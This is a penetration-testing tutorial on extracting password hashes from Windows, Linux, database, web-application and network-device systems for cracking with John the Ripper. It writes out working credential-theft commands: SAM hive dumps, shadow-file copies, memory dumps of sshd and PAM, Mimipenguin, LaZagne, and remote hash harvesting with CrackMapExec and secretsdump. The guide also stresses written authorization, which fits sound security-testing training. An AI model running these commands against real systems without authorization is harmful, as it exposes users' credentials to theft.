Exploitation: Extracting Password Hashes

Learn techniques for extracting password hashes from various systems for password cracking with John the Ripper

The exploitation phase in password cracking focuses on extracting password hashes from target systems. This is a critical step that bridges the gap between identifying vulnerabilities and actually cracking passwords. This guide covers techniques for extracting password hashes from various systems and preparing them for cracking with John the Ripper.

Windows Password Hash Extraction

Extracting from SAM Database

The Security Account Manager (SAM) database stores local user account information including password hashes.

Using reg.exe (requires Administrator privileges)

# Save the SAM and SYSTEM hives
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

Using secretsdump.py from Impacket

# Extract hashes from the saved files
secretsdump.py -sam sam.save -system system.save LOCAL

Using John the Ripper's built-in tools

# Convert the SAM and SYSTEM files to John format
pwdump sam.save system.save > hashes.txt

# Alternatively, use the built-in script
run/pwdump.py sam.save system.save > hashes.txt

The extracted hashes will be in the format username:RID:LM hash:NT hash::: which is directly compatible with John the Ripper.

Linux/Unix Password Hash Extraction

Shadow File Extraction

The /etc/shadow file contains user password hashes on Linux/Unix systems.

# Direct copy (requires root)
sudo cp /etc/shadow /tmp/shadow_copy

# Using cat (requires root)
sudo cat /etc/shadow > /tmp/shadow_copy

# Using John's unshadow tool
sudo unshadow /etc/passwd /etc/shadow > /tmp/passwords.txt

The unshadow tool combines information from both files into a format that John the Ripper can use directly.

Hash Format Conversion

Convert extracted hashes to formats compatible with John the Ripper:

# For shadow file
sudo unshadow /etc/passwd /etc/shadow > unshadowed.txt

# For specific hash types
grep -v '^#' /etc/shadow | cut -d: -f1,2 > shadow_hashes.txt

# For specific users
grep "username" /etc/shadow | cut -d: -f1,2 > user_hash.txt

John the Ripper can automatically detect most hash types from the shadow file format.

Extracting from Linux Memory

1
Dump process memory

Use memory forensics tools to extract credentials from memory:

# Using gcore to dump process memory
sudo gcore -o auth_dump $(pgrep sshd)

# Using GDB
sudo gdb -p $(pgrep pam) -ex "generate-core-file /tmp/pam_core" -ex "quit"

These commands create memory dumps of authentication-related processes.

2
Extract strings from memory dumps

Search for password hashes or plaintext credentials:

# Search for shadow file format patterns
strings auth_dump | grep -E '\\$[1-9]\\$'

# Search for common password patterns
strings auth_dump | grep -E 'password|passwd|pwd'

This may reveal credentials cached in memory.

3
Use specialized tools

Several tools can extract credentials from memory:

# Using Mimipenguin
sudo python3 mimipenguin.py

# Using LaZagne
sudo python3 laZagne.py all

These tools are designed to extract credentials from memory on Linux systems.

Database Password Hash Extraction

Web Application Password Hash Extraction

Extracting from Configuration Files

Web applications often store database credentials in configuration files:

PHP Applications

# Search for common config files
find /var/www/ -name "config.php" -o -name "wp-config.php" -o -name "settings.php"

# Extract database credentials
grep -E "password|passwd|pwd" /var/www/html/config.php

.NET Applications

# Search for web.config files
find /var/www/ -name "web.config"

# Extract connection strings
grep -A 3 "connectionString" /var/www/site/web.config

Java Applications

# Search for properties files
find /var/www/ -name "*.properties" -o -name "application.yml"

# Extract credentials
grep -E "password|passwd|pwd" /var/www/app/application.properties

Use these credentials to access the database and extract password hashes.

Network Device Password Hash Extraction

Cisco Devices

Extract password hashes from Cisco devices:

# Show running configuration
show running-config

# Look for lines like:
enable secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0
username admin privilege 15 secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0

Format for John the Ripper:

# For type 5 passwords (MD5)
echo "admin:$1$mERr$hx5rVt7rPNoS4wqbXKX7m0" > cisco_hashes.txt

# Use John with the md5crypt format
john --format=md5crypt cisco_hashes.txt

For type 8 (PBKDF2) and type 9 (scrypt) hashes, use appropriate formats.

Juniper Devices

Extract password hashes from Juniper devices:

# Show configuration
show configuration | display set | match encrypted-password

# Look for lines like:
set system root-authentication encrypted-password "$1$rhyKTjKM$EJl4xnwrP.KGK/0QY0wYv0"

Format for John the Ripper:

# For MD5 hashes
echo "root:$1$rhyKTjKM$EJl4xnwrP.KGK/0QY0wYv0" > juniper_hashes.txt

# Use John with the md5crypt format
john --format=md5crypt juniper_hashes.txt

For SHA-256 and SHA-512 hashes, use the appropriate formats.

Other Network Devices

1
Extract configuration

Access the device configuration through:

  • Console access
  • SSH/Telnet access
  • TFTP backup
  • SNMP configuration download
# Using SNMP to download config (if enabled)
snmpwalk -c community -v2c 192.168.1.1 .1.3.6.1.4.1.9.9.96.1.1.1.1.2
2
Identify hash formats

Different devices use different hash formats:

  • Cisco: Type 5 (MD5), Type 8 (PBKDF2), Type 9 (scrypt)
  • Juniper: $1$ (MD5), $5$ (SHA-256), $6$ (SHA-512)
  • Fortinet: Proprietary format
  • Mikrotik: MD5 or SHA-256

Identify the format based on the prefix or documentation.

3
Format for John the Ripper

Prepare the hashes for cracking:

# General format
echo "username:hash" > network_hashes.txt

# Use appropriate format flag
john --format=md5crypt network_hashes.txt  # For Cisco Type 5
john --format=sha256crypt network_hashes.txt  # For SHA-256 hashes

Some proprietary formats may require custom rules or formats.

Preparing Hashes for John the Ripper

Converting Hashes to John Format

John the Ripper expects hashes in specific formats:

Windows Hashes

# Convert Windows hashes to John format
python3 john/run/pwdump2john.py windows_dump.txt > john_windows_hashes.txt

# For NTDS dumps
python3 john/run/secretsdump2john.py ntds_dump.txt > john_ntds_hashes.txt

Linux/Unix Hashes

# Combine passwd and shadow files
unshadow /etc/passwd /etc/shadow > john_linux_hashes.txt

Database Hashes

# Convert MySQL hashes
python3 john/run/mysql_to_john.py mysql_dump.txt > john_mysql_hashes.txt

# Convert Oracle hashes
python3 john/run/oracle2john.py oracle_dump.txt > john_oracle_hashes.txt

John includes many conversion scripts in the run/ directory.

Hash Extraction Tools

Built-in John the Ripper Tools

John the Ripper includes many extraction and conversion tools:

  • unshadow: Combines passwd and shadow files
  • zip2john: Extracts hashes from password-protected ZIP files
  • pdf2john: Extracts hashes from password-protected PDF files
  • office2john: Extracts hashes from MS Office documents
  • ssh2john: Extracts hashes from SSH private keys
# Example usage
./run/zip2john protected.zip > zip_hash.txt
./run/pdf2john document.pdf > pdf_hash.txt
./run/ssh2john id_rsa > ssh_hash.txt

These tools create output in formats ready for John the Ripper.

Third-Party Extraction Tools

Several third-party tools complement John the Ripper:

  • Mimikatz: Windows credential extraction
  • Hashcat Utils: Hash manipulation tools
  • CrackMapExec: Network credential harvesting
  • Impacket: Windows hash extraction tools
  • LaZagne: Credential recovery tool
# Example with CrackMapExec
crackmapexec smb 192.168.1.0/24 -u administrator -p password --sam

# Example with Impacket's secretsdump
secretsdump.py domain/user:password@192.168.1.100

These tools can extract hashes from various sources.

Documentation and Chain of Custody

1
Document authorization

Always maintain proper documentation:

  • Written authorization from system owner
  • Scope of the assessment
  • Specific systems authorized for testing
  • Time frame for testing activities
2
Maintain chain of custody

Protect extracted password data:

  • Store hashes in encrypted containers
  • Limit access to authorized personnel only
  • Delete data when no longer needed
  • Document all handling of password data
3
Report findings responsibly

Follow responsible disclosure practices:

  • Report vulnerabilities to system owners
  • Provide clear remediation guidance
  • Do not share credentials or hashes publicly
  • Follow the organization's security policies

Professional Tip:

Always verify that your hash extraction methods are working correctly by testing them in a controlled environment first. This ensures you'll be able to extract hashes efficiently during actual assessments and reduces the risk of errors that might impact system stability.

Next Steps

Now that you understand how to extract password hashes from various systems, you can:

  1. Learn about password cracking strategies using John the Ripper
  2. Explore optimization best practices to improve cracking efficiency
  3. Study tool integration to combine John with other security tools